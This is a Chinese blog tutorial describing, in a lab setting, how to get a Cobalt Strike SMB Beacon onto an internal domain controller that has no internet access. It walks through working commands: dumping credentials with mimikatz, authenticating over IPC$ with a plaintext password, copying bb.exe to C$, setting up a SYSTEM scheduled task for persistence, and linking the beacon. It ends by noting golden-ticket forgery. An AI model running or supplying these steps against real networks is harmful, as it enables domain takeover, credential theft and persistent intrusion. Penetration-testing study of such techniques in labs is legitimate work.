当我们想上线不出网的机器的时候，我们可以通过上传工具来实现，但是有没有不用上传工具的方法呢？？？ 有！！！ 而且cs会自带！！！

1.基础的网络拓扑

  以下就是今天的实验拓扑

2.什么是beacon

Beacon 是 Cobalt Strike 中的一个组件，它是一个轻量级的恶意软件代理，用于与攻击者的控制服务器通信，并执行各种渗透测试任务。

Beacon 提供了一个灵活的框架，允许渗透测试人员在目标系统上执行各种任务，包括横向移动、数据收集、执行命令等。Beacon 与 Cobalt Strike 的其他模块协同工作，提供了一个强大的攻击平台，用于模拟真实威胁行为以及测试网络的安全性

3.设置监听器

因为这个实验的目的是上线内网的DC到cs，所以上线web双网卡的操作就省略了

首先，我们要设置一个监听器

 

在payload那里是可以选择Beacon_tcp的，但是在这里我选择了Beacon_SMB

4.生成能上线内网机器的木马

记得选择的木马是带S的！！我给他取名为bb.exe了

5.建立IPC管道

在默认的情况下IPC管道是开启的，我们就可以通过建立IPC管道来将生成的木马扔到域控上面

net use \\域控的ip\ipc$  "域控的密码" /user:域名\域控的名字

这时候有人就会问，我没有域控的密码啊！！！ 别急，有反转，用mimikatz，只需在cs直接run mimikatz就好（cs还自带的mimkatz，真的太强啦）

 

所以我本次实验环境的payload就是

net use \\192.168.52.138\ipc$ "hongrisec@2024" /user:god\administrator

建立完连接之后，就可以通过以下命令查看他的连接情况

shell net use

可以看见是建立了一个远程的IPC管道 

 

6.通过IPC管道上传木马

首先上传木马到win7这一步我就不说了，来讲讲怎么上传到DC上

因为已经建立了IPC管道的信任关系，所以就可以用COPY的命令去上传

shell copy bb.exe \\192.168.52.138\c$

7.颁布计划任务

shell schtasks /create /s 192.168.52.138 /tn whoami /sc onstart /tr c:\bb.exe /ru system /f

以上的命令的意思是，创建在域控上创建一个名字为whoami的计划任务，并且在开机下就自动以system的身份去运行

8.运行计划任务

shell schtasks /run /s 192.168.52.138 /i /tn "whoami"

这样，就运行了一个计划任务 

 9.上线不出网的DC

最后只需要执行这样的命令就能上线不出网的DC了

link 192.168.52.138 
connect 192.168.52.138

因为网上说的connect我试过不行，但是link我发现是可以的，可能connet对应的beacon种类不同

这样，我们就能成功上线了不出网的内网机器了！！！！

在拿下了域控制器之后，就基本上可以为所欲为了，伪造黄金票据，进而伪造域中的任何用户！！！

最后声明：byd要开学了，五天早八，好想死，以后就更新不及时了，各位看官见谅（忙是我的谎言），要备考NISP2级啦😭😭😭😭😭希望一次就过！！！！！！！！！